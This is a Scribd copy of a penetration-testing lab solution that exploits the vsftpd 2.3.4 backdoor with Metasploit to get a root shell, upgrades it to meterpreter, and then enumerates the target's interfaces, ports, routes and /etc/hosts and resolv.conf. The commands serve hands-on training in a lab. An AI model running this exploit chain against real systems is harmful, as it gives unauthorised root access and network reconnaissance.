Scribd
Upload
32 views8 pages

Enumerating Linux Network Information

Uploaded by

Mark Wendel Pacot
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
32 views8 pages

Enumerating Linux Network Information

Uploaded by

Mark Wendel Pacot
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 8

Solution

Step 1: Open the lab link to access the Kali terminal instance

Step 2: Identify the target IP address

To begin with you will need to identify the target system's IP address, this can be done by
running the following command:

Command:

ifconfig

As shown in the following screenshot, locate the IP address associated with theeth1interface, the
target IP address is the next IP within the subnet.

In this case the Kali Linux IP is 192.198.70.2 so the target IP will be 192.198.70.3.

Note: In your case the IP address will be different, ensure that you substitute the IP in your lab
environment with the one shown below.

Step 3: Port scanning with Nmap

Now that we have identified the target IP address, we can perform a port scan to identify
vulnerable services running on the target system. This can be done by running the following
command:

Command:

nmap -sV 192.198.70.3


The Nmap scan reveals that the target has an FTP server running on port 21. The version column
from the Nmap scan reveals that the FTP server isvsftpd 2.3.4. This version ofvsftpdis
vulnerable to a backdoor command execution vulnerability and can be exploited with a
Metasploit module.
Step 4: Gaining access

Now that we have identified the vulnerable service running on the target, we can start the
Metasploit Framework console (msfconsole) by running the following command:

Command:

msfconsole

We can now load the appropriate exploit module by running the following command:
Command:

use exploit/unix/ftp/vsftpd_234_backdoor

We will now need to configure the module options, more specifically the target IP address, this
can be done by running the following command:
Command:

set RHOSTS 192.198.70.3

We can now run the module by running the following command:


Command:

exploit

As shown in the following screenshot, if the exploit runs successfully, we will be provided with a
command shell session withrootprivileges on the target system.

Because the command shell session is non-interactive, we will need to spawn a bash session, this
can be done by running the following command:

Command:

/bin/bash -i
You can also obtain a meterpreter session on the target system by upgrading the command shell
session. This can be done by running the following commands:

Command:

CTRL + Z

Command:

sessions -u 1

As shown in the preceding screenshot, upgrading the command shell to a meterpreter session is
successful and we can now interact with the target system via the meterpreter session with
a SESSION ID of 2.

Command:

sessions 2

Step 5: Enumerating network information

Now that we have gained access to the target system and have obtained a meterpreter session,
we can begin enumerating network information from the target system.

The first piece of information that we can enumerate is the list of network interfaces connected to
the target system and their respective IP addresses, this can be done by running the
following meterpreter command:
Command:

ifconfig

As shown in the following screenshot, the target system has one physical interface (eth0) a
loopback interface (lo) for local connections and a virtual interface (ip_vti0).
We can get a list of open ports on the target system by running the
following meterpreter command:

Command:

netstat

Another important piece of information to obtain is the routing table, this can be done by running
the following command:

Command:

route
As shown in the preceding screenshot, this will give you an idea of all the routes available and
will also display the default gateway address.

This information can also be gathered manually by spawning a shell session and running the
following commands:

Command:

ip a s

As shown in the preceding screenshot, this command will display the list of network interfaces
connected to the target system.

We can also enumerate the list of configured networks and their subnets by running the
following command:

Command:

cat /etc/networks
Most importantly, we can enumerate the list of locally mapped domains and their respective IP
addresses by displaying the content of the /etc/hosts file.

Command:

cat /etc/hosts

As shown in the following screenshot, this file reveals that thevictim-1hostname is mapped to
the target IP address.

In order to identify the default DNS name server address, we can run the following command:

Command:

cat /etc/resolv.conf

You might also like